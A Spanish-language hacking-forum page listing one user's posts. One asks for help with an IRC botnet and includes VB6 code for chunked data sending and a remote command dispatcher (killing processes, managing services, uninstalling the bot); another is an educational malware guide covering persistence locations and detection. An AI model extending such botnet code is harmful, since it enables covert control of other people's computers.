elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16
41  Programación / Programación Visual Basic / Problema con Botnet IRC en: 16 Noviembre 2010, 13:42 pm
Bueno, me explico, estoy haciendo una botnet IRC con interfaz usuario (parecido a un RAT) y tengo algunos problemas en el envio de datos, el protocolo IRC me limita bastante e intento escapar como puedo de esas limitaciones. Uno de mis primeros problemas es el envio de datos, yo envio los datos partiendolo en 429 carácteres, ya que los mensajes en los canales IRC no permiten mas.. por lo tanto mi método de envio es así :

Código
  1. Public Function Split_Data(ByVal Total_Data As String, ByVal Channel As String)
  2.    Dim lData              As Long
  3.    Dim lPack              As Long
  4.    Dim sData              As String
  5.  
  6.    'Total_Data = "[E]" & Huffman.EncodeString(Total_Data)
  7.    lData = Len(Total_Data)
  8.  
  9.    If s_Active = True Then
  10.        If lData > 429 Then
  11.            lPack = (Len(Total_Data) / 429) + 1
  12.  
  13.            While p < lPack
  14.                  If s_Active = True Then
  15.                        If p = 0 Then
  16.                                  sData = Mid$(Total_Data, 1, 429)
  17.                        Else
  18.                                  sData = Mid$(Total_Data, p * 429, 429)
  19.                        End If
  20.  
  21.                        Wait 2
  22.                        mSock.SendData mSock.CurrentSocketHandle, "PRIVMSG " & Channel & " " & sData & vbCrLf
  23.  
  24.                        p = p + 1
  25.                        DoEvents
  26.                  End If
  27.            Wend
  28.        Else
  29.                  Wait 2
  30.                  mSock.SendData mSock.CurrentSocketHandle, "PRIVMSG " & Channel & " " & Total_Data & vbCrLf
  31.        End If
  32.    End If
  33.  
  34.    p = 0
  35. End Function

Todo bien, lo que quiero resaltar es ese entero llamado p (numero de paquetes) que lo uso aparte de para ir contando los paquetes de 429 carácteres, lo uso para saber si todavía sigue enviando datos, porque las funciones cuando el servidor las recibe las pongo como en una especie de cola ejecutandose en un nuevo 'thread' :

Código
  1. Public Function set_Timer(ByVal hWnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
  2.    If p = 0 Then
  3.       Call KillTimer(hWnd, uElapse)
  4.  
  5.       Select Case uElapse
  6.               Case 1:       Sender_Info (s_Chan)
  7.               Case 2:       Sender_TotalInfo (s_Chan)
  8.               Case 3:       Sender_Process (s_Chan)
  9.               Case 4:       Terminate_Process (Command(2))
  10.               Case 5:       Sender_Services (s_Chan)
  11.               Case 6:       Start_Service (Command(2))
  12.               Case 7:       Stop_Service (Command(2))
  13.               Case 8:       Delete_Service (Command(2))
  14.               Case 9:       Restart_BOT
  15.               Case 10:      Close_BOT
  16.               Case 11:      Uninstall_BOT
  17.               Case 12:      Sender_Windows (s_Chan)
  18.               'Case 13:      Close_Window (Command(2))
  19.               'Case 14:      Hide_Window (Command(2))
  20.               'Case 15:      Maximize_Window (Command(2))
  21.               'Case 16:      Minimize_Window (Command(2))
  22.               'Case 17:      Show_Window (Command(2))
  23.       End Select
  24.    End If
  25. End Function

Como véis la p la uso como identificador para saber si sigue enviandose la anterior función para poder seguir con la siguiente... mi problema es que la p a veces (cuando el cliente envia muchas funciones seguidas) me falla como identificador y se para la acción anterior, envia la siguiente o simplemente hace un exceso de flood en el IRC.. no se me ocurre ningún identificador para eso.

Ese era mi primer problema, mi segundo problemilla (me interesa primero el anterior para resolver) es la lentitud de envio, sabiendo que envia solo 429 carácteres en cada paquete de envio y tiene que enviar mucha información, no sabría como saltarme ese limite de otra forma.

Saludos! =)
42  Seguridad Informática / Análisis y Diseño de Malware / Re: Guía Básica sobre el Malware en: 16 Noviembre 2010, 11:32 am
 Ten cuidado con los consejos que das  de como evitarlos ya que podrias arruinarte el negocio.

No me importa, 'el negocio' me da igual si marcha bien o mal... no lo tengo como primer ideal, mi primer ideal es el aprendizaje, asi que no le tomo mucha importancia a eso.

Un saludo y gracias! =)
43  Seguridad Informática / Análisis y Diseño de Malware / Re: Guía Básica sobre el Malware en: 15 Noviembre 2010, 22:57 pm
Gracias a ustedes. =)
44  Seguridad Informática / Análisis y Diseño de Malware / Re: Guía Básica sobre el Malware en: 15 Noviembre 2010, 21:25 pm
Gracias Zero, i <3 you  :-*
45  Programación / Programación Visual Basic / Re: [Ayuda] Leer Mails Con VB6 en: 15 Noviembre 2010, 18:28 pm
No se si he entendido bien, ¿lo que quieres es obtener los e-mails de la bandeja de entrada?.. si es así con conectarte al servidor por winsock y usando comandos del protocolo de pop3 tiene que funcionar.. ¿o no?

Algo así : http://www.helpy.com.ar/telnet/comprobar-correo-pop.htm

Saludos!
46  Seguridad Informática / Análisis y Diseño de Malware / Guía Básica sobre el Malware en: 15 Noviembre 2010, 18:00 pm
    Bueno ayer hice una pequeña guía explicando lo que es el malware en general un poco de historia, sus funciones básicas y algunas cositas mas..
dejo los links ya que sinceramente me dá un poco de pereza pegarlo y ordenarlo todo con BBCodes  :-[

Citar
  • Índice
  • Presentación
  • Historia
  • Porqué y cómo se programa
  • Tipos
  • Identificación
    • ¿Desde dónde llega?
    • ¿Cómo se instala en nuestro equipo?
    • ¿Cómo podemos evitarlo?
    • ¿Cómo podemos detectarlo y eliminarlo?
  • Despedida


Presentación

Bueno, antes que nada gracias por elegir este blog para informarte y guiarte sobre la [In]Seguridad Informática y el Analisis y diseño de Malware, esta guia/manual ha sido escrita por mi (shark0) con el único objetivo de informar y enseñar a la gente que todavía no está muy metida en el mundo ‘underground’ de la informática. Cualquier comentario, queja, o idea que quieras compartir puedes escribirme a shark0[at]hotmail.es o dejar un comentario en esta misma entrada.Espero que te sirva de mucho este documento.Aclarar que en esta guía se hablará de malware basado para el sistema operativo Windows.

Historia

Citar
Malware (del inglés malicious software), también llamado badware, software malicioso o software malintencionado es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El término malware es muy utilizado por profesionales de la informática para referirse a una variedad de software hostil, intrusivo o molesto. El término virus informático es utilizado en muchas ocasiones para referirse a todos los tipos de malware, incluyendo los verdaderos virus.El software es considerado malware en base a las intenciones del autor a la hora de crearlo. El término malware incluye virus, gusanos, troyanos, la mayoría de los rootkits, spyware, adware intrusivo, crimeware y otros software maliciosos e indeseables.

Como todo lo relacionado con la tecnología el Malware ha avanzado mucho desde el precursor de los virus informáticos, el juego CoreWar (1959) era un juego basado en la teoría de Von Neumann y en el que el objetivo es que programas combatan entre sí tratando de ocupar toda la memoria de la máquina eliminando así a los oponentes.

En 1972 Robert Thomas Morris crea el primer virus (Creeper) era capaz de infectar máquinas IBM 360 de la red ARPANET, para eliminarlo se creó otro virus (vacuna) llamado Reaper.

En 1987 hace su aparición el virus Jerusalem o Viernes 13, que era capaz de infectar archivos .EXE y .COM. Su primera aparición fue reportada desde la Universidad Hebrea de Jerusalem y ha llegado a ser uno de los virus más famosos de la historia.

En 1999 surge el gusano Happy desarrollado por el francés Spanska que crea una nueva corriente en cuanto al desarrollo de malware que persiste hasta el día de hoy: el envío de gusanos por correo electrónico. Este gusano estaba encaminado y programado para propagarse a través del correo electrónico.

En el año 2000 hubo una infección que tuvo muchísima repercusión mediática debido a los daños ocasionados por la infección tan masiva que produjo. Fuel el gusano I Love You o LoveLetter, que, basándose en técnicas de ingeniería social infectaba a los usuarios a través del correo electrónico. Comenzaba aquí la época de grandes epidemias masivas que tuvieron su punto álgido en el 2004.

Fue en ese año cuando aparecieron gusanos como el Mydoom, el Netsky, el Sasser, o el Bagle, que alarmaron a toda la sociedad y lo que buscaban era tener la mayor repercusión y reconocimiento posible. Ese fue el año más duro de este tipo epidemias y curiosamente el último. Los creadores de malware se dieron cuenta de que sus conocimientos servirían para algo más que para tener repercusión mediática… para ganar dinero.

Fuente : Panda Security, Wikipedia

Porqué y cómo se programa

Cualquier tipo de malware es programado según los ideales que tenga el programador, el malware actualmente se programa por o para:

  • Su estudio y análisis para fortalecer la seguridad
  • Su alta demanda en el mercado negro
  • Compartirlo y ‘ganar un poco de fama’
  • Uso a una baja, media o alta escala
  • La competición entre empresas

Hay gente novata que cree que el malware se programa de forma diferente a un software, el malware se programa como cualquier otro tipo de software, con cualquier lenguaje de programación y conocimiento sobre él, se puede programar.

Tipos

Existen muchos tipos de malware, y a medida de que va pasando el tiempo se van creando nuevos y más avanzados. Actualmente los más oidos en el mundo ‘underground’ son los siguientes:

  • Troyano : Es uno de los malwares mas usados, se basa en la conexión de un cliente y servidor oculto, ya sea por conexión directa (cliente > servidor) o conexión inversa (servidor>cliente), el cliente manda ordenes al servidor y posteriormente el servidor las ejecuta. Un troyano actualmente puede recopilar todas las funciones que se puedan imaginar (captura de pantalla, captura de camara web, propagación como un gusano, administración de archivos.. procesos.. servicios.., keylogger, etc..) es el malware mas completo que hay hoy en dia ya que reune todas las funciones de los tipos de malware en uno solo.

  • Botnet : Parecido a un troyano pero con otros ideales, el troyano se suele usar para espiar las maquinas infectadas, en cambio una botnet se suele usar para infectar un alto numero de maquinas (zombies, bots..) y usarlas para atacar a un host, con ataques como DDOS.. no suele ser raro que las companías usen esta clase de malware para quitarse de en medio a la competencia.

  • Virus : Un virus informático es un malware que tiene una función fija a ejecutar, al contrario que un troyano o una botnet que no tienen objetivo de destrucción y que se manejan por un usuario. La mayoría de virus son usados para uso destructivo.

  • Gusano : Los gusanos informáticos cumplen una función básica, que es propagarse así mismo o duplicarse, se suele propagar por canales de comunicación como la Mensajeria Instantanea, redes P2P, redes compartidas.. su función secundaria es consumir ancho de banda o dejar inestable una red.

  • Keylogger : El keylogger es otro malware espía, su función principal es la captura de teclas presionadas en el ordenador, posteriormente se enviaría un log al usuario atacante con todas las teclas capturadas y ventanas abiertas. Se usa mucho en el cibercrimen para el robo de cuentas de cualquier tipo. Aparte de la existencia de un keylogger tipo Software, existe también el keylogger tipo hardware, que tiene la forma de un pendrive.

  • Stealer : Un stealer es  un tipo de malware ‘nuevo’ por llamarlo de alguna forma, su función es el robo de cualquier tipo de información, mayormente cuentas de programas que necesiten un login como clientes FTPs, Mensajeria Instantánea o simplemente el robo de información. No es necesaria su instalación ya que cuando se ejecuta el stealer rapidamente captura los datos y se los envia al atacante por medio de FTP, E-MAIL o WEB, posteriormente se borra así mismo.

  • Rootkit : Es un malware que tiene una sola función, esconderse así mismo o esconder a otro tipo de malware ya sea troyano, keylogger…, hay rootkits para diferentes sistemas operativos e interactúan desde el kernel para poder tener control total sobre el sistema y así esconderse de una forma avanzada.

  • Adware : Es un malware molesto, el adware es la publicidad que sale al meterse en alguna pagina web sospechosa o por medio de alguna aplicación, su objetivo es hacer pagar al usuario un software para que quite el montón de publicidad, claramente ese software es creado por los creadores de adware y así cobrar una cantidad de dinero. También obtienen cierta información del usuario lo cual se caracteriza también como Spyware.

  • Spyware : El spyware se encarga de instalarse en el ordenador del usuario, recopila información privada y se la manda a empresas publicitarias u otras organizaciones interesadas.

  • Bootkit : Los bootkits son un tipo de hibrido entre virus~rootkit, es un malware avanzado que se instala en el sector cero (MBR) del disco duro, son muy dificiles de eliminar e invisibles, por más que formatees seguirá ahí.
  • Backdoor : Un backdoor es una puerta trasera que deja el programador en una aplicación para poder saltarse la seguridad o algoritmo que lleva, como una especie de atajo.

Aparte de estos tipos de Malware, existen herramientas paralelas para el uso de malware, aquí entran los programas que se encargan de facilitar el envío de estos y saltar cualquier tipo de obstáculo que pueda surgir en la máquina o en la desconfianza del usuario al ejecutarlo.

  • Crypter : Los crypters (Encriptadores), se encargan de ofuscar un archivo con un algoritmo para que los antivirus no puedan detectarlo, posteriormente al abrir el archivo final, el llamado ‘Stub’ del crypter descifra el archivo y lo ejecuta en memoria para que los antivirus no puedan detectarlo.

  • Binder : Los binders (Juntadores), se encargan de unir varios archivos en uno solo, esto facilita al atacante la ingenieria social sobre el usuario a infectar, juntando el servidor de un troyano por ejemplo con una imagen, al abrir el archivo final se ejecuta el servidor del troyano en conjunto con la imagen, haciendole creer al usuario que es una imagen de verdad.

  • Joiner : Los joiners es igual que un binder con una simple diferencia y es que tambien se encarga de cifrar los archivos para no ser detectados, es el conjunto de un binder con un crypter.
  • Spreader : Los spreaders (Propagadores), se encargan de añadir un gusano al malware seleccionado, así empezará a propagarse por los diferentes tipos de protocolos y aplicaciones.

  • Downloader : Los downloaders (Descargadores), se suelen usar cuando un malware es muy pesado por cualquier motivo, empezaron a salir cuando el protector Themida empezó a usarse para ofuscar distintos tipos de malware y en consecuencia de ello los dejaba muy pesados, los downloaders descargan un archivo alojado en un hosting y lo ejecuta silenciosamente.


- ¿Desde dónde llega?

El malware puede llegar desde cualquier sitio, cuando un sistema es inseguro puede meterse cualquiera en nuestro sistema, seguidamente explicaré cómo pueden llegar a nuestro sistema sin darnos cuenta.

  • Desde internet : Internet es una red muy amplia, el 60% de las aplicaciones que usamos comúnmente en nuestro ordenador utiliza esta gran red. Pongamos el ejemplo de que encendemos el ordenador e iniciamos sesión, el 90% de las personas después de encender el ordenador se meten a programas de comunicación y redes sociales. Nos metemos a nuestro programa de mensajería instantánea y un amigo te propone enviarte un archivo. Te fijas que te está enviando un archivo comprimido en (.rar) o (.zip), donde dentro hay un archivo ejecutable (.exe), él te dice que es una imagen (en realidad es un archivo ejecutable con el icono cambiado por un archivo de imagen), a simple vista parece una imagen, pero si tienes configurado en las opciones de carpeta poder ver la extensión te das cuenta.


Los extensiones de archivos ejecutables en Windows son : (.exe), (.com ), (.scr), (.pif).. cualquiera de estas extensiones puede ejecutar una cabecera PE. Hay muchas formas de intrusión de malware por internet :

  • Paginas webs falsas: Hay muchas paginas web con código dañino para que se descargue malware en tu pc, por ejemplo los llamados ‘fakes’ que son objetos falsos en la página web, un ejemplo que hacen creer al usuario de que su versión de Adobe Flash Player está desactualizada y le pide que descargue la que ofrece la pagina web.
  • Paginas webs que explotan vulnerabilidades: Cada día salen nuevas vulnerabilidades para cualquier tipo de software, los navegadores no son menos para salvarse, algunas vulnerabilidades se aprovechan de  un fallo en el navegador para que cuando un usuario entre a la pagina web se le ejecute silecionsamente y automáticamente un archivo ejecutable sin la necesidad de que el usuario interactue.

  • Redes P2P: El protocolo P2P (Peer to Peer) se encarga de compartir archivos entre ordenadores que interactuan como cliente y servidor a la misma vez, un usuario cualquiera puede poner a compartir el servidor de un troyano con un nombre falso como por ejemplo el nombre de una canción conocida y todas las personas que busquen el nombre de esa canción y se descargan ese archivo, lo ejecutarán.

  • Vulnerabilidades: Las vulnerabilidades de las aplicaciones son muy importantes en el tema de nuestra seguridad, si una persona ataca a nuestro ordenador con un lanzador de exploits como Metasploit, sabiendo que usamos una aplicación que es vulnerable a ejecución de código remoto, podrá obtener la consola de nuestro sistema, ejecutarnos cualquier archivo, listarnos los procesos, etc.. Para prevenir estos incidentes hay que tener siempre las aplicaciones que usemos actualizadas u otra aplicación paralela que cumpla con la misma función.

  • E-Mails con adjuntos:La mayoría de los virus en la época fueron propagados por e-mail, hoy en dia se sigue haciendo enviando e-mails con archivos adjuntos, aunque los servicios de correo como hotmail y gmail tengan un antivirus para el escaneo de esos archivos adjuntos, no hay que confiarse ya que un antivirus es facil saltarselo.

  • Desde red local o físicamente: Como suelen decir, a veces el enemigo está en casa, suponiendo que un ordenador no tenga acceso a internet y que este infectado de algun tipo de malware, es porque hay dos posibles propagaciones. Alguien puede entrar fisicamente al ordenador y sin saberlo poner un pendrive que tiene un gusano dentro que ha sido propagado por toda la red y también cumple con una función de propagación por USB, al conectar el pendrive automaticamente gracias a un fichero Autorun.inf se ejecutará y seguirá intentando infectar por red local (compartiendo archivos por netbios) o por dispositivos extraíbles.


- ¿Cómo se instala en nuestro equipo?

Dependiendo el tipo de malware y con la estructura de programación que cumplió el programador a la hora de crearlo se instalará de una forma u otra o no se instalará. En caso de que el malware se instale siempre procurará hacerlo oculto y silencioso, es obvio que el programador no quiera que el usuario se dé cuenta de que se ha instalado un ‘bichito’ en su equipo.

En Windows hay varias maneras de instalarse para que al arrancar el sistema se siga ejecutando el archivo.

  • Run : Por registro (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run), se agrega una clave nueva en la carpeta Run del registro, es facil de detectar esta instalación ejecutando el archivo ‘msconfig’ desde la consola y en la pestaña inicio se puede ver los programas que se inician con la clave de registro.

  • RunOnce : Igual que Run, (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce).

  • ActiveX : Por registro, es la carpeta de los componentes instalados, igual que los dos anteriores pero en este caso no se muestra en la pestaña Inicio de msconfig, (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components).

  • Carpeta Inicio : Es una carpeta de windows cuya ruta es (C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio),  todo programa que se encuentre en esa carpeta se ejecutará al inicio.

  • ShellExplorer : Otra ruta de registro, esta se encarga de iniciar el explorer.exe del sistema windows (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell).

  • UserInit : Otra ruta de registro, esta se encarga de iniciar el userinit.exe del sistema, (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit).

  • Complemento de Navegador : Al instalar un complemento para un navegador especifico, puede saltar la seguridad del filtro de complementos del navegador y ejecutar algun malware.

  • Driver o Servicio : Algunos malwares como los Rootkits necesitan instalarse a un nivel para poder controlar mucho más el pc infectado, algunos llegan hasta el ring0.

El malware antes de agregarse al inicio del sistema se copia en algun directorio para posteriormente iniciarse, para ayudarse a que no sea visto se copia con atributos de ocultación o para ayudarse a no ser eliminado se atribuye también tipo de archivo del sistema. En algunos casos puede llegar haber dos archivos para la instalación, el segundo archivo se encargaría de verificar si el archivo se ha borrado volverlo a instalar, por lo tanto es doble el trabajo para desintalarlo.


¿Cómo podemos evitarlo?

Es dificil estar siempre 100% seguros a ataques ya que siempre se puede cometer algun error, pero se pueden prevenir los más básicos de las siguientes formas:
  • Descargar software que necesitemos de paginas webs de confianza o de la pagina oficial del autor.
  • Tener actualizado al dia cualquier aplicación que usemos.
  • Tener un antivirus actualizado al dia, el 40% de las veces no confien en el escaneo del antivirus, ya que hay muchas técnicas de indetectabilización de malware.
  • Tener un sniffer para controlar las conexiones que se hacen en tu ordenador.
  • Tener un firewall seguro y actualizado.
  • Instalar una maquina virtual y ejecutar los programas en ella para un posterior análisis, cuando se esté seguro pasarlo al ordenador personal.


¿Cómo podemos detectarlo y eliminarlo?

En el caso de que nos hallamos despistado y tengamos algún malware dentro de nuestro ordenador, primero que nada repasar los consejos anteriores para evitarlos, en el caso de que no podamos encontrarlo o detectarlo, a continuación haré una breve demostración con la ayuda de algunas aplicaciones de como podemos detectarlo.

Pongamos el ejemplo de que empiece a funcionar un poco raro nuestro ordenador, el led de la camara web se prende y se apaga, hay mucho consumo de banda ancha, y el sistema vaya un poco lento. Sabemos que algo raro está pasando pero.. ¿que puede ser?, lo primero que miraremos será las conexiones entrantes y salientes con un sniffer muy simple y a nivel usuario, el TcpView.

Primero de todo cabe aclarar que algunos malwares se inyectan en algunos procesos del sistema, o se inyectan en el navegador predeterminado para ello se necesitan algunos sniffers mas avanzados como por ejemplo el WireShark o el SocketSniff.

Yo pondré un ejemplo básico para que os de por lo menos una idea, al abrir el TcpView vemos un montón de conexiones a la izquierda vemos el icono y el nombre de la aplicación y a la derecha vemos todos los datos de conexión.


Me capta la atención una conexión, y es que hay un proceso que se está conectando a una ip con el puerto común del protocolo IRC, pero.. ¿como puede ser? si yo no estoy en ningún canal chateando por IRC.. si le damos a click derecho en el proceso y a Process Properties nos mostrará información sobre la ruta donde se encuentra el archivo, cerrariamos el proceso y lo borrariamos.

Pero.. yo no me quedo tranquilo, ¿como puedo saber yo si se ha eliminado completamente, y no hay ningún malware por ahí molestando?.. miraremos haber si hay alguna aplicación que se haya añadido al inicio de windows, para ello utilizaremos una aplicación muy conocida, HijackThis.


Al hacerle click a Scan, mostrará las aplicaciones que están agregadas al inicio de windows, servicios, etc.. Por suerte nuestro pequeño ‘Bot.exe’ no se inicia con windows, pero  ¿y si.. se sobrescribió un programa que usa mucha gente como el Messenger, y el bot sobreescribió el archivo del Msn por el del bot? el proceso del MSN se inicia con windows, por eso siempre hay que fijarse si no hay ninguna sustitución.

Bueno ahora que sabemos donde está y si se instaló o no.. quiero saber de donde vino.. para ello podemos ir sacando algunos datos, por ejemplo utilizaremos un editor hexadecimal como el HexWorkShop. Con este programa miraremos si hay texto legible en hexadecimal, los compiladores de los lenguajes de programación añaden datos al ejecutable, también el servidor de troyanos o distintos tipos de malware tienen que guardar la información que le pasan en algún lado.. hay varios lugares donde un malware puede puede guardar los datos de configuración y las ordenes con las que se programó si se usó un constructor (builder), dos de ellos son:

  • EOF : End Of File (Final del archivo), algunos constructores que configuran el servidor guardan los datos al final del archivo, si los datos no llegan estar cifrados o son faciles de descifrar se puede obtener datos importantes del atacante mirandolo con un editor hexadecimal.
  • Recursos : La otra forma de guardar los datos que un constructor tiene, es por medio de los recursos, el constructor añade un recurso al servidor con todos los datos metidos, para poder ver si tiene recursos que puedan ser importantes para obtener información se puede usar un editor de recursos como el Resource Hacker o XN Resource Editor.

Aquí podemos ver que el compilador de VB6 ha añadido la ruta del proyecto, en la ruta viene incluido el nombre de usuario del atacante.


Se puede deducir que he sido atacado con una botnet manejada por IRC.

Si nos cuesta mucho encontrar donde está el malware, podemos optar a descargar un antivirus como el NOD32, actualizarlo y hacer un escaner para ver si detecta el bicho.

Pero como dice el refrán mejor prevenir que curar, dejaré algunas aplicaciones de análisis que les puede servir para cuando descarguen o le pasen un archivo sospechoso puedan analizarlo completamente, obviamente.. analizandolo todo desde una maquina virtual como VMWare.



Despedida

Bueno creo que la guía fue un poco básica y que les ayudará a muchos de posibles ataques que tengan a aquellas personas que no sabían mucho sobre el tema, cualquier duda que tengan o idea para añadir (por si se me escapó algo) pueden comentar en esta misma entrada.

Saludos![/list]
47  Seguridad Informática / Hacking Ético / Re: Problemas con Nessus 4.2.2 en: 24 Septiembre 2010, 22:58 pm
Hmmm..

Bueno pues intenta buscar en la confi (no de los plugins a pripori) algo sobre "delay" en entre conexion y conexion. Pero como es que te peta la conexion?? Cuales son los sintomas de que te "peta" ?


Saludos.

Me consume el ancho de banda, caida del msn, tarda en cargar las paginas webs etc..

Saludos!  :)
48  Seguridad Informática / Hacking Ético / Re: Problemas con Nessus 4.2.2 en: 24 Septiembre 2010, 20:52 pm
Dios existe ! :D

Bueno el parametro "-t" supuestamente recompila los plugins, asi pues seria para hacer el de nmap visible.


Saludos y postea si tienes mas problemas  :)

Bueno, un ultimo problema, veo que escanea puertos pero se me peta la conexión.. además tarda mucho escaneando puertos y no se si escaneara y dará resultados de posibles vulnerabilidades.



¿Como puedo hacer para que no me pete la conexión?.
49  Seguridad Informática / Hacking Ético / Re: Problemas con Nessus 4.2.2 en: 24 Septiembre 2010, 01:02 am
No se que puede pasar, pero si que voy apuntando a que no tienes bien configurado Nessus :D Prueba a ver y deshabilita algo como lols "safe checks", si es que lo tienes habilitado claro..


P.D: No te olvides de recompilar los plugins con "nessusd.exe -t" tras poner el de nmap.nasl en la carpeta ..

Ahora parece que si funciona!¡, puedes explicarme que hace el parametro '-t' del nessusd?

Saludos!

PD : Por si acaso sigo probando.
50  Seguridad Informática / Hacking Ético / Re: Problemas con Nessus 4.2.2 en: 23 Septiembre 2010, 16:47 pm
Hehe,

yo solo uso OpenVas y desde Linux, ademas solo desde el command line.
Solo te podria pasar el "-c file" :D, nada, no creo que te sirviera.

Yo lo que digo es que habilites algun plugin de Port Scann no ?

Para ello vamos a intentar habilitar nmap.nasl. Bajatelo de aqui:
http://www.nessus.org/documentation/nmap.nasl

Pondlo en el directorio de plugin y:

- para el servicio de Nessus
- Ejecuta como Administrador el comando (desde donde tengas nessusd.exe si es que no lo tienes el el PATH) "nessusd.exe -t" (para recompilar los plugins)
- Comienza de nuevo el servicio de nessus


Tras ello mira en la confi a que tengas el plugin de nmap habilitado. Tras ello intenta scannear, postea lo que ocurra.


Saludos.

He puesto el plugin en la carpeta, ejecutado el nessud.exe, cargado todos los plugins, servidor abierto y encendido.. pero sigo teniendo el problema de que en el port scanner no muestra ningun plugin, ni siquiera el de nmap que acabo de poner :



No se que puede ser..
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines